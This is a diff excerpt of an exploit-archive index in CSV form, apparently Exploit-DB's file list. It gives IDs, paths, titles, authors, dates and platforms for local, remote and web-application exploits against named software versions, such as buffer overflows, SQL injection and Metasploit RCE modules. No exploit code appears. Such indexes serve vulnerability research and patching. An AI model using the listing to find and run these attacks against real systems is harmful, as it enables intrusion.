3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10281,6 +10286,10 @@ id,file,description,date,author,type,platform,port
46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows,
46331,exploits/windows/local/46331.py,"River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)",2019-02-06,"Matteo Malvica",local,windows,
46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,
46335,exploits/windows/local/46335.py,"River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)",2019-02-11,Achilles,local,windows,
46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17142,7 +17151,6 @@ id,file,description,date,author,type,platform,port
45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple,
46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
@ -17157,6 +17165,9 @@ id,file,description,date,author,type,platform,port
46242,exploits/linux/remote/46242.txt,"Ghostscript 9.26 - Pseudo-Operator Remote Code Execution",2019-01-24,"Google Security Research",remote,linux,
46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,
46307,exploits/linux/remote/46307.py,"LibSSH 0.7.6 / 0.8.4 - Unauthorized Access",2018-10-20,jas502n,remote,linux,
46339,exploits/osx/remote/46339.rb,"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)",2019-02-11,Metasploit,remote,osx,
46340,exploits/php/remote/46340.rb,"NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)",2019-02-11,Metasploit,remote,php,80
46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40799,3 +40810,10 @@ id,file,description,date,author,type,platform,port
46328,exploits/php/webapps/46328.txt,"osCommerce 2.3.4.1 - 'currency' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
46329,exploits/php/webapps/46329.txt,"osCommerce 2.3.4.1 - 'products_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware,
46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,
46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
46349,exploits/linux/webapps/46349.txt,"CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting",2019-02-11,DKM,webapps,linux,
46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,

Can't render this file because it is too large.